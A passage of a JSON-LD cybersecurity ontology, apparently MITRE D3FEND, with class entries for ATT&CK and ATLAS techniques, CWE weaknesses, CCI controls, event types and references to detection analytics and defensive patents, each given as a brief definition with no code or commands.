          "@id": "_:Na0765048a8ab4f9e819b56e3378dc736"
        },
        {
          "@id": "_:Ned516982de9342e18c7d9a21e872b64a"
        }
      ]
    },
    {
      "@id": "_:Na0765048a8ab4f9e819b56e3378dc736",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputerPlatform"
      }
    },
    {
      "@id": "_:Ned516982de9342e18c7d9a21e872b64a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:CCI-002891_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements remote disconnect verification at the termination of nonlocal maintenance and diagnostic sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-22T00:00:00"
      },
      "rdfs:label": "CCI-002891"
    },
    {
      "@id": "d3f:Reference-CAR-2014-05-001%3ARPCActivity_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-05-001/"
      },
      "d3f:kb-abstract": "Microsoft Windows uses its implementation of Distributed Computing Environment/Remote Procedure Call (DCE/RPC), which it calls Microsoft RPC, to call certain APIs remotely.\n\nA Remote Procedure Call is initiated by communicating to the RPC Endpoint Mapper, which exists as the Windows service RpcEptMapper and listens on the port 135/tcp. The endpoint mapper resolves a requested endpoint/interface and responds to the client with the port that the service is listening on. Since the RPC endpoints are assigned ports when the services start, these ports are dynamically assigned from 49152 to 65535. The connection to the endpoint mapper then terminates and the client program can communicate directly with the requested service.\n\nRPC is a legitimate functionality of Windows that allows remote interaction with a variety of services. For a Windows environment to be properly configured, several programs use RPC to communicate legitimately with servers. The background and benign RPC activity may be enormous, but must be learned, especially peer-to-peer RPC between workstations, which is often indicative of Lateral Movement.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RPCTrafficAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2014-05-001: RPC Activity",
      "rdfs:label": "Reference - CAR-2014-05-001: RPC Activity - MITRE"
    },
    {
      "@id": "d3f:CWE-1025",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1025",
      "d3f:definition": "The code performs a comparison between two entities, but the comparison examines the wrong factors or characteristics of the entities, which can lead to incorrect results and resultant weaknesses.",
      "rdfs:label": "Comparison Using Wrong Factors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:WindowsNtResumeThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtResumeThread",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIResumeThread"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2016-04-004_SuccessfulLocalAccountLogin",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-04-004/"
      },
      "d3f:kb-reference-of": {
        "@id": "d3f:LocalAccountMonitoring"
      },
      "d3f:kb-reference-title": "Reference - CAR-2016-04-004: Successful Local Account Login",
      "rdfs:label": "Reference - CAR-2016-04-004: Successful Local Account Login"
    },
    {
      "@id": "d3f:AnonymousPipe",
      "@type": "owl:Class",
      "d3f:definition": "In computer science, an anonymous pipe is a simplex FIFO communication channel that may be used for one-way interprocess communication (IPC). An implementation is often integrated into the operating system's file IO subsystem. Typically a parent program opens anonymous pipes, and creates a new process that inherits the other ends of the pipes, or creates several new processes and arranges them in a pipeline.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Anonymous_pipe"
      },
      "rdfs:label": "Anonymous Pipe",
      "rdfs:subClassOf": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:T1542",
      "@type": "owl:Class",
      "d3f:attack-id": "T1542",
      "d3f:definition": "Adversaries may abuse Pre-OS Boot mechanisms as a way to establish persistence on a system. During the booting process of a computer, firmware and various startup services are loaded before the operating system. These programs control flow of execution before the operating system takes control.(Citation: Wikipedia Booting)",
      "rdfs:label": "Pre-OS Boot",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:AML.T0072",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0072",
      "d3f:definition": "Adversaries may utilize a reverse shell to communicate and control the victim system.\n\nTypically, a user uses a client to connect to a remote machine which is listening for connections. With a reverse shell, the adversary is listening for incoming connections initiated from the victim system.",
      "rdfs:label": "Reverse Shell - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0072"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASCommandAndControlTechnique"
      },
      "skos:prefLabel": "Reverse Shell"
    },
    {
      "@id": "d3f:CWE-1300",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1300",
      "d3f:definition": "The device does not contain sufficient protection mechanisms to prevent physical side channels from exposing sensitive information due to patterns in physically observable phenomena such as variations in power consumption, electromagnetic emissions (EME), or acoustic emissions.",
      "rdfs:label": "Improper Protection of Physical Side Channels",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-203"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndSystemForDetectingRestrictedContentAssociatedWithRetrievedContent_SophosLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20160359883A1"
      },
      "d3f:kb-abstract": "In embodiments of the present invention improved capabilities are described for detecting restricted content associated with retrieved content. The method and system may include receiving a client request for content, saving contextual information from the client request, presenting retrieved content in response to the client request, and presenting the contextual information from the client request, and retrieved content, to a scanning facility. The scanning facility may utilize the contextual information from the client request to aid in the detection of restricted content associated with retrieved content.",
      "d3f:kb-author": "Fraser Howard; Paul Baccas; Vanja Svajcer; Benjamin John Godwood; William James McCourt",
      "d3f:kb-mitre-analysis": "This patent describes analyzing contextual information of a Uniform Resource Identifier (URI), such as source or origin of the request URI, patterns in the way the URI is delivered, and the locale of the URI. The contextual information is sent to a scanning facility which uses that information along with a blacklist of known malicious domain names, locations, patterns, etc. to block retrieved content associated with the request URI.",
      "d3f:kb-organization": "Sophos Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:URLAnalysis"
      },
      "d3f:kb-reference-title": "Method and system for detecting restricted content associated with retrieved content",
      "rdfs:label": "Reference - Method and system for detecting restricted content associated with retrieved content - Sophos Ltd"
    },
    {
      "@id": "d3f:T0881",
      "@type": "owl:Class",
      "d3f:attack-id": "T0881",
      "d3f:definition": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. (Citation: Enterprise ATT&CK)  Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction. (Citation: Enterprise ATT&CK)",
      "rdfs:label": "Service Stop - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Service Stop"
    },
    {
      "@id": "d3f:Reference-Network-BasedBufferOverflowDetectionByExploitCodeAnalysis_InformationSecurityResearchCentre",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://eprints.qut.edu.au/21172/1/21172.pdf"
      },
      "d3f:kb-abstract": "Buffer overflow attacks continue to be a major security problem and detecting attacks of this nature\nis therefore crucial to network security. Signature based network based intrusion detection systems (NIDS)\ncompare network traffic to signatures modelling suspicious or attack traffic to detect network attacks. Since\ndetection is based on pattern matching, a signature modelling the attack must exist for the NIDS to detect it, and\nit is therefore only capable of detecting known attacks. This paper proposes a method to detect buffer overflow\nattacks by parsing the payload of network packets in search of shellcode which is the remotely executable\ncomponent of a buffer overflow attack. By analysing the shellcode it is possible to determine which system\ncalls the exploit uses, and hence the operation of the exploit. Current NIDS-based buffer overflow detection\ntechniques mainly rely upon specific signatures for each new attack. Our approach is able to detect previously\nunseen buffer overflow attacks, in addition to existing ones, without the need for specific signatures for each\nnew attack. The method has been implemented and tested for buffer overflow attacks on Linux on the Intel x86\narchitecture using the Snort NIDS.",
      "d3f:kb-author": "Stig Andersson, Andrew Clark, and George Mohay",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Information Security Research Centre",
      "d3f:kb-reference-of": {
        "@id": "d3f:ByteSequenceEmulation"
      },
      "d3f:kb-reference-title": "Network-Based Buffer Overflow Detection by Exploit Code Analysis",
      "rdfs:label": "Reference - Network-Based Buffer Overflow Detection by Exploit Code Analysis - Information Security Research Centre"
    },
    {
      "@id": "d3f:TrustedAttacker",
      "@type": "owl:Class",
      "d3f:definition": "An individual who exploits their authorized access to conduct unauthorized actions, either intentionally or through negligence.",
      "rdfs:label": "Trusted Attacker",
      "rdfs:subClassOf": {
        "@id": "d3f:Attacker"
      }
    },
    {
      "@id": "d3f:MotionDetectedEvent",
      "@type": "owl:Class",
      "rdfs:label": "Motion Detected Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessAlarmEvent"
        },
        {
          "@id": "_:N8faa83fbd4ed410fb536c400f07b8cd1"
        }
      ]
    },
    {
      "@id": "_:N8faa83fbd4ed410fb536c400f07b8cd1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MotionDetector"
      }
    },
    {
      "@id": "d3f:T1069",
      "@type": "owl:Class",
      "d3f:attack-id": "T1069",
      "d3f:definition": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.",
      "rdfs:label": "Permission Groups Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:ProcessEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing lifecycle transitions, interactions, or activities of computer processes, including their creation, termination, and inter-process communication.",
      "rdfs:label": "Process Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/process_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N1a035736e62d463499aa43c5989f3016"
        }
      ]
    },
    {
      "@id": "_:N1a035736e62d463499aa43c5989f3016",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:NTPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Network Time Protocol (NTP), a protocol designed to synchronize the clocks of computer systems over packet-switched, variable-latency data networks, UDP as its transport protocol.",
      "rdfs:label": "NTP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/ntp_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:UDPEvent"
        },
        {
          "@id": "_:N088f8cc037bb40f89693e2b423a5caca"
        }
      ]
    },
    {
      "@id": "_:N088f8cc037bb40f89693e2b423a5caca",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTimeServer"
      }
    },
    {
      "@id": "d3f:DS0015",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:broader": {
        "@id": "d3f:Log"
      },
      "d3f:definition": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)",
      "rdfs:label": "Application Log (ATT&CK DS)"
    },
    {
      "@id": "d3f:OSAPITraceThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that enables a program to monitor, control, or interact with the execution of a thread.",
      "d3f:invokes": {
        "@id": "d3f:TraceThread"
      },
      "rdfs:label": "OS API Trace Thread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N027b967a6ef14ee3be939cf8337e845a"
        }
      ]
    },
    {
      "@id": "_:N027b967a6ef14ee3be939cf8337e845a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TraceThread"
      }
    },
    {
      "@id": "d3f:T1034",
      "@type": "owl:Class",
      "d3f:attack-id": "T1034",
      "d3f:definition": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Path Interception by PATH Environment Variable](https://attack.mitre.org/techniques/T1574/007), [Path Interception by Search Order Hijacking](https://attack.mitre.org/techniques/T1574/008), and/or [Path Interception by Unquoted Path](https://attack.mitre.org/techniques/T1574/009).**",
      "rdfs:label": "Path Interception",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:OTEstablishRemoteConnectionCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Used to establish an TCP/IP Connection to the target device.",
      "rdfs:label": "OT Establish Remote Connection Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTConnectionCommandEvent"
        },
        {
          "@id": "_:Nbccf9133bb9c4bb5907bd31067a62a19"
        }
      ]
    },
    {
      "@id": "_:Nbccf9133bb9c4bb5907bd31067a62a19",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTEstablishRemoteConnectionCommand"
      }
    },
    {
      "@id": "d3f:T1592.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1592.002",
      "d3f:definition": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).",
      "rdfs:label": "Software",
      "rdfs:subClassOf": {
        "@id": "d3f:T1592"
      }
    },
    {
      "@id": "d3f:CWE-307",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-307",
      "d3f:definition": "The product does not implement sufficient measures to prevent multiple failed authentication attempts within a short time frame.",
      "rdfs:label": "Improper Restriction of Excessive Authentication Attempts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-799"
        }
      ]
    },
    {
      "@id": "d3f:T1072",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:File"
      },
      "d3f:attack-id": "T1072",
      "d3f:definition": "Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. Examples of such solutions include: SCCM, HBSS, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc, and GCP Deployment Manager.",
      "d3f:executes": {
        "@id": "d3f:SoftwareDeploymentTool"
      },
      "d3f:installs": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Software Deployment Tools",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        },
        {
          "@id": "_:N00bc76040e15494280f78745328d9a24"
        },
        {
          "@id": "_:N42439ad5a7874bdc8ef3aaef4abebecb"
        },
        {
          "@id": "_:N3a37d90d57654b5489d0aa1861c73936"
        }
      ]
    },
    {
      "@id": "_:N00bc76040e15494280f78745328d9a24",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N42439ad5a7874bdc8ef3aaef4abebecb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SoftwareDeploymentTool"
      }
    },
    {
      "@id": "_:N3a37d90d57654b5489d0aa1861c73936",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:installs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1507",
      "@type": "owl:Class",
      "d3f:attack-id": "T1507",
      "d3f:definition": "Adversaries may use device sensors to collect information about nearby networks, such as Wi-Fi and Bluetooth.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1421",
      "rdfs:label": "Network Information Discovery - ATTACK Mobile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1421"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCollectionTechnique"
      },
      "skos:prefLabel": "Network Information Discovery"
    },
    {
      "@id": "d3f:T1584.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1584.001",
      "d3f:definition": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)",
      "rdfs:label": "Domains",
      "rdfs:subClassOf": {
        "@id": "d3f:T1584"
      }
    },
    {
      "@id": "d3f:HeterogeneousFeature-basedTransferLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-HFBTL",
      "d3f:definition": "Symmetric transformation  takes both the source feature space Xs and target feature space Xt and learns feature transformations as to project each onto a common subspace Xc for adaptation purposes. This derived subspace becomes a domain-invariant feature subspace to associate cross-domain data, and in effect, reduces marginal distribution differences.",
      "d3f:kb-article": "## References\nWang, Q., Mao, K. Z., Wang, B., & Guan, J. (2017). Big data clustering by hybrid optimization algorithm. Journal of Big Data, 4(1), 25. [Link](https://journalofbigdata.springeropen.com/articles/10.1186/s40537-017-0089-0).",
      "rdfs:label": "Heterogeneous Feature-based Transfer Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:HeterogeneousTransferLearning"
      }
    },
    {
      "@id": "d3f:MacOSKeychain",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Keychain is the password management system in macOS, developed by Apple. It was introduced with Mac OS 8.6, and has been included in all subsequent versions of the operating system, now known as macOS. A Keychain can contain various types of data: passwords (for websites, FTP servers, SSH accounts, network shares, wireless networks, groupware applications, encrypted disk images), private keys, certificates, and secure notes.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Keychain_(software)"
      },
      "rdfs:label": "MacOS Keychain",
      "rdfs:subClassOf": {
        "@id": "d3f:PasswordStore"
      },
      "skos:altLabel": "Keychain"
    },
    {
      "@id": "d3f:PropositionalLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PL",
      "d3f:definition": "Propositional logic deals with statements (i.e., propositions, which can be true or false) and relations between propositions, including the construction of arguments based on them.",
      "d3f:kb-article": "## How it works\nCompound propositions are formed by connecting propositions by logical connectives. Propositions that contain no logical connectives are called atomic propositions.\n\n## References\n1. Propositional Calculus. (2022, May 31). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Propositional_calculus)",
      "d3f:synonym": "Propositional Calculus",
      "rdfs:label": "Propositional Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:SymbolicAI"
      }
    },
    {
      "@id": "d3f:T1098.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1098.002",
      "d3f:definition": "Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.",
      "d3f:modifies": {
        "@id": "d3f:DomainUserAccount"
      },
      "rdfs:label": "Additional Email Delegate Permissions",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1098"
        },
        {
          "@id": "_:N54a9601e016c470abd16cd86fc374729"
        }
      ]
    },
    {
      "@id": "_:N54a9601e016c470abd16cd86fc374729",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-507",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-507",
      "d3f:definition": "The product appears to contain benign or useful functionality, but it also contains code that is hidden from normal operation that violates the intended security policy of the user or the system administrator.",
      "rdfs:label": "Trojan Horse",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-506"
      }
    },
    {
      "@id": "d3f:CWE-294",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-294",
      "d3f:definition": "A capture-replay flaw exists when the design of the product makes it possible for a malicious user to sniff network traffic and bypass authentication by replaying it to the server in question to the same effect as the original message (or with minor changes).",
      "rdfs:label": "Authentication Bypass by Capture-replay",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1390"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodsThereofForLogicalIdentificationOfMaliciousThreatsAcrossAPluralityOfEnd-pointDevicesCommunicativelyConnectedByANetwork_PaloAltoNetworksIncCyberSecdoLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180373870A1/en?oq=US-2018373870-A1"
      },
      "d3f:kb-abstract": "A computerized method for logical identification of malicious threats across a plurality of end-point devices (EPD) communicatively connected by a network, comprising collecting over the network an identifier associated with each file of a plurality of files, wherein each file of the plurality of files is installed on at least one of the plurality of EPDs and wherein the identifier is the same for each like file of the plurality of file. Information associated with an identified subset of files is collected, wherein the information indicates at least a time at which the at least one file was installed on one or more of the plurality of EPDs and the way the at least one file spread within the network. The collected information is analyzed according to a set of predetermined computerized investigation rules. The analysis is used to determine whether at least a file of the identified subset files is a suspicious file.",
      "d3f:kb-author": "Gil BARAK",
      "d3f:kb-mitre-analysis": "This patent describes detecting suspicious files using file metadata such as the prevalence of the file deployed on the network, file installation times, and how the file was spread within the network. The combination of these factors are used to determine a risk score of the file and if below a threshold, sends an alert.",
      "d3f:kb-organization": "Palo Alto Networks IncCyber Secdo Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileContentRules"
      },
      "d3f:kb-reference-title": "System and methods thereof for logical identification of malicious threats across a plurality of end-point devices (epd) communicatively connected by a network",
      "rdfs:label": "Reference - System and methods thereof for logical identification of malicious threats across a plurality of end-point devices (epd) communicatively connected by a network - Palo Alto Networks IncCyber Secdo Ltd"
    },
    {
      "@id": "d3f:CWE-188",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-188",
      "d3f:definition": "The product makes invalid assumptions about how protocol data or memory is organized at a lower level, resulting in unintended program behavior.",
      "rdfs:label": "Reliance on Data/Memory Layout",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1105"
        },
        {
          "@id": "d3f:CWE-435"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1384",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1384",
      "d3f:definition": "The product does not properly handle unexpected physical or environmental conditions that occur naturally or are artificially induced.",
      "rdfs:label": "Improper Handling of Physical or Environmental Conditions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-703"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2020-11-001%3ABootOrLogonInitializationScripts_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-11-001/"
      },
      "d3f:kb-abstract": "Adversaries may schedule software to run whenever a user logs into the system; this is done to establish persistence and sometimes for lateral movement. This trigger is established through the registry key HKEY_CURRENT_USER\\EnvironmentUserInitMprLogonScript. This signature looks edits to existing keys or creation of new keys in that path. Users purposefully adding benign scripts to this path will result in false positives; that case is rare, however. There are other ways of running a script at startup or login that are not covered in this signature. Note that this signature overlaps with the Windows Sysinternals Autoruns tool, which would also show changes to this registry path.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemInitConfigAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-11-001: Boot or Logon Initialization Scripts",
      "rdfs:label": "Reference - CAR-2020-11-001: Boot or Logon Initialization Scripts - MITRE"
    },
    {
      "@id": "d3f:T1626",
      "@type": "owl:Class",
      "d3f:attack-id": "T1626",
      "d3f:definition": "Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.",
      "rdfs:label": "Abuse Elevation Control Mechanism - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePrivilegeEscalationTechnique"
      },
      "skos:prefLabel": "Abuse Elevation Control Mechanism"
    },
    {
      "@id": "d3f:CWE-79",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-79",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.",
      "d3f:synonym": [
        "CSS",
        "DOM-Based XSS / Type 0 XSS",
        "HTML Injection",
        "Reflected XSS / Non-Persistent XSS / Type 1 XSS",
        "Stored XSS / Persistent XSS / Type 2 XSS",
        "XSS"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "rdfs:label": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-74"
        },
        {
          "@id": "_:N6c583a90b3ef4edbb0a3eff997be7cc4"
        }
      ]
    },
    {
      "@id": "_:N6c583a90b3ef4edbb0a3eff997be7cc4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "d3f:T1020",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1020",
      "d3f:definition": "Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.(Citation: ESET Gamaredon June 2020)",
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Automated Exfiltration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N9e1c9dc329b94e8dbc490acbf5ff6cee"
        }
      ]
    },
    {
      "@id": "_:N9e1c9dc329b94e8dbc490acbf5ff6cee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:WatchdogTimerResetEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a watchdog timer is reset as a consequence of watchdog timer expiry or watchdog timer escalation policy.",
      "rdfs:label": "Watchdog Timer Reset Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WatchdogTimerEvent"
      }
    },
    {
      "@id": "d3f:T1060",
      "@type": "owl:Class",
      "d3f:attack-id": "T1060",
      "d3f:definition": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1547.001",
      "rdfs:label": "Registry Run Keys / Startup Folder",
      "rdfs:seeAlso": {
        "@id": "d3f:T1547.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:DataExchangeMapping",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DataExchangeMapping"
      ],
      "d3f:d3fend-id": "D3-DEM",
      "d3f:definition": "Data exchange mapping identifies and models the organization's intended design for the flows of the data types, formats, and volumes between systems at the application layer.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-CatiaUAFPlugin"
        },
        {
          "@id": "d3f:Reference-TivoliApplicationDependencyDiscoverManager7_3_0DependenciesBetweenResources"
        },
        {
          "@id": "d3f:Reference-UnifiedArchitectureFrameworkUAF"
        }
      ],
      "d3f:maps": {
        "@id": "d3f:DataDependency"
      },
      "d3f:synonym": [
        "Data Flow Mapping",
